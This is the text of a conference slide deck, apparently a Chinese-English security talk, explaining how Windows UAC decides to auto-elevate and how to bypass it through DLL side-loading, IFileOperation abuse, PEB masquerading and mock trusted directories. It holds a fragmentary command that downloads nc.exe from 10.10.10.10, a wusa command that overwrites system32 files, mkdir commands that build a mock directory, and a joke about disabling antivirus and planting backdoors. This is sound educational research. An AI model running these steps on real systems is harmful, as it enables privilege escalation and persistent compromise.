SITCON: Playing Win32 Like a K!NG ;)

Slide 1

Slide 1 text

2020 (New-Object System.Net.WebClient).Dow /10.10.10.10/nc.exe","nc.ex PS C:\> [System.Convert]::ToBase64Strin ext.Encoding]::UTF8.Ge 414141414141414141 AAAAAAAAAA SITCON cmd.exe /c "d Playing Win32 Like a K!NG ;) aaaddress1@chroot.org

Slide 2

Slide 2 text

#Windows #Reversing #Pwn #Exploit $man • Master degree at CSIE, NTUST • Security Researcher - chrO.ot • Speaker - BlackHat, DEFCON, VXCON, HITCON • aaaddress1@chroot.org • Hao's Arsenal

Slide 3

Slide 3 text

aaaddress1@chroot.org 1. UAC Design 2. Exploit Attacks 1. Misc Method 2. CIA Vault7: Elevated COM Object Method 3. UAC Bypass by Mocking Trusted Directories 3. Recap /?outline

Slide 4

Slide 4 text

aaaddress1@chroot.org 〉〉〉UAC Design

Slide 5

Slide 5 text

aaaddress1@chroot.org /?UAC

Slide 6

Slide 6 text

aaaddress1@chroot.org /?UAC

Slide 7

Slide 7 text

syscall Ring0 Ring3 Explorer (A.) RunAs UAC Service (B.) Send a task by RPC message to UAC service for creating a different privilege child process RPC trust_authA consent.exe privileged child process trust_authB

Slide 8

Slide 8 text

aaaddress1@chroot.org • TrustAuth_A # trust path verify - $p = ToDosName("C:\\a.exe") # \??\C:\a.exe - $p.startswith(\??\C:\Windows\System32) or $p.startswith(\??\C:\Windows\SysWoW64) - deny-list /?auth_a

Slide 9

Slide 9 text

aaaddress1@chroot.org • TrustAuth_B - whitelisted *.exe with M$ signature - or AutoElevate marked as TRUE in manifest.xml /?auth_b

Slide 10

Slide 10 text

aaaddress1@chroot.org /?Bypass • UAC: 朕不給的，你拿不⾛！ • TrustAuth_A # binary from the trusted zone? A. launched from the system directory B. whitelisted + signed by M$ • TrustAuth_B # should be elevated? C. marked as auto-elevated or whitelisted PS C:> sigcheck.exe -m C:\Windows\System32\Taskmgr.exe 所以現在... 我們有⼀份好棒棒⽬標名單

Slide 11

Slide 11 text

aaaddress1@chroot.org • Misc: 在野奇技淫巧系列✨ • CIA: Elevated COM Object Method • Mocking Trusted Directories /?attack

Slide 12

Slide 12 text

aaaddress1@chroot.org /?misc#1 Accessing Access Tokens for UIAccess www.tiraniddo.dev/2019/02/accessing-access-tokens-for-uiaccess.html 幫你⾃動按確定︖ 舉⼿之勞啦

Slide 13

Slide 13 text

aaaddress1@chroot.org /?misc#2 • 那我們能讓⾼權服務直接呼叫我們嗎 • Bypassing UAC on Windows10 using Disk Cleanup enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup

Slide 14

Slide 14 text

aaaddress1@chroot.org /?misc#3 • 解壓縮直接把系統程式檔案蓋掉 $ wusa hack.cab /extract: C:\windows\system32 msitpros.com/?p=3100

Slide 15

Slide 15 text

aaaddress1@chroot.org 〉〉〉IFileOperation

Slide 16

Slide 16 text

aaaddress1@chroot.org /?RunAs consent.exe

Slide 17

Slide 17 text

aaaddress1@chroot.org /?fileCopy

Slide 18

Slide 18 text

aaaddress1@chroot.org /?alert

Slide 19

Slide 19 text

aaaddress1@chroot.org 'PE' Opt Header .text .EntryPoint .ImageBase Section Data .rdata .idata a.exe Process PEB PE Module ntdll.dll VERSION.dll user32.dll ... LoadLibrary() $PATH: { "C:\hijack\VERSION.dll", "C:\Windows\System32\VERSION.dll", "C:\Windows\SysWoW64\VERSION.dll", ... } C:\hijack\a.exe /?hijack

Slide 20

Slide 20 text

aaaddress1@chroot.org • DLL Side-Loading → to hijack auto-elevated windows services by drop a malicious *.dll binary • IFileOperation → file arbitrary writing if you're Explorer → drop *.dll into C:\windows\system32 to hijack • DLL Injection → do things as Explorer https://github.com/hjc4869/UacBypass /?bypass#1

Slide 21

Slide 21 text

malware system32\cliconfg.exe /?bypass#1 explorer.exe Process ntdll.dll kernel32.dll user32.dll malware.dll (a.) inject *.dll module (b.) create a new thread to wake malware up (c.) drop a *.dll into %system32% to hijack service (d.) get privileged by dll hijack

Slide 22

Slide 22 text

aaaddress1@chroot.org • 更動 Windows 註冊序號 →駭客可以幫你安裝正版的 Windows！ • 執⾏磁碟管理⼯具 →電腦跑很慢電腦垃圾太多︖駭客幫你磁碟重整⼀下 • 幫你移除防毒軟體 →覺得防毒讓電腦跑很慢︖沒關係駭客幫你刪掉 (⁎⁍̴̛ᴗ⁍̴̛⁎) • 寫入開機啟動項 →駭客可以植入開機⾃動執⾏的後⾨ watch after you ;) /?bypass4what

Slide 23

Slide 23 text

aaaddress1@chroot.org 'PE' Opt Header .text .EntryPoint .ImageBase Section Data .rdata .idata Source.cpp Compiler 'MZ' Opt Header ImageBase .text .rdata .idata Process Application Loader EntryPoint PEB "C:\Windows\explorer.exe" PE Module /?MasqueradePEB

Slide 24

Slide 24 text

aaaddress1@chroot.org • DLL Side-Loading → to hijack auto-elevated windows services by drop a malicious *.dll binary • IFileOperation + MasqueradePEB → file arbitrary writing as Explorer → drop *.dll into C:\windows\system32 to hijack /?bypass#2

Slide 25

Slide 25 text

Slide 26

Slide 26 text

system32\cliconfg.exe /?bypass#2 malware.exe Process ntdll.dll kernel32.dll user32.dll (a.) Masquerade current path as explorer.exe (b.) drop a *.dll into %system32% to hijack service (c.) get privileged by dll hijack PEB "C:\Windows\explorer.exe"

Slide 27

Slide 27 text

aaaddress1@chroot.org Vault 7: CIA Hacking Tools Revealed /?WikiLeaks wikileaks.org/ciav7p1/cms/page_3375231.html

Slide 28

Slide 28 text

aaaddress1@chroot.org /?IFileOperation http://d1iv3.me/2017/08/11/Bypass-UAC-⽅法研究/

Slide 29

Slide 29 text

aaaddress1@chroot.org /?IFileOperation http://d1iv3.me/2017/08/11/Bypass-UAC-⽅法研究/

Slide 30

Slide 30 text

aaaddress1@chroot.org /?IFileOperation http://d1iv3.me/2017/08/11/Bypass-UAC-⽅法研究/

Slide 31

Slide 31 text

aaaddress1@chroot.org Vault 7: CIA Hacking Tools Revealed /?WikiLeaks wikileaks.org/ciav7p1/cms/page_3375231.html M$ patched this vulnerability after Win10 version 1607 (include known *.dll lead to hijack)

Slide 32

Slide 32 text

Slide 33

Slide 33 text

aaaddress1@chroot.org 〉〉〉Mocking Directory

Slide 34

Slide 34 text

Slide 35

Slide 35 text

Slide 36

Slide 36 text

aaaddress1@chroot.org /?DACL

Slide 37

Slide 37 text

aaaddress1@chroot.org /?DACL

Slide 38

Slide 38 text

aaaddress1@chroot.org $ mkdir "C:\Windows \" $ mkdir "C:\Windows \System32" /?DACL

Slide 39

Slide 39 text

Slide 40

Slide 40 text

aaaddress1@chroot.org RtlDosPathNameToRelativeNtPathName_U_WithStatus( GetLongPathNameW(L"C:\Windows \System32\a.exe") ) RtlDosPathNameToRelativeNtPathName_U_WithStatus( L"C:\Windows\System32\a.exe" ) $p = L"\??\C:\Windows\System32\a.exe" /?auth_a AiLaunchProcess(L"C:\Windows \System32\a.exe")

Slide 41

Slide 41 text

aaaddress1@chroot.org • TrustAuth_A - Path Normalization Issues • TrustAuth_B - Whitelisted EXE Files with Trusted Signature - AutoElevated Marked EXE Files → DLL Side-Loading Tricks to hijack windows services • UAC Bypass by Mocking Trusted Directories /?attack

Slide 42

Slide 42 text

aaaddress1@chroot.org 〉〉〉Recap

Slide 43

Slide 43 text

aaaddress1@chroot.org /?HITCON www.youtube.com/watch?v=6LUo-Crd9pc

Slide 44

Slide 44 text

aaaddress1@chroot.org • UAC Design - auth_a: *.exe launched from the system - auth_b: marked as AutoElevated • Bypass Tricks - Issue: IFileOperation, Path Normalization - DLL Side-Loading - Code Inject / MasqueradePEB - DEFCON 25: UAC 0day, all day! by @FuzzySec /?recap

Slide 45

Slide 45 text

aaaddress1@chroot.org /?HITCON

Slide 46

Slide 46 text

萬⽤劫持本地提权情報滲透越級注入 PS C:\> [System.Convert]::ToBase64String([Sy ext.Encoding]::UTF8.GetByte cmd.exe /c "dir" 414141414141414141 AAAAAAAAAAAAAAAAAAAAAA aaaddress1@chroot.org 遠程後⾨網軍⾏動 Thanks! Slide Github @aaaddress1 Facebook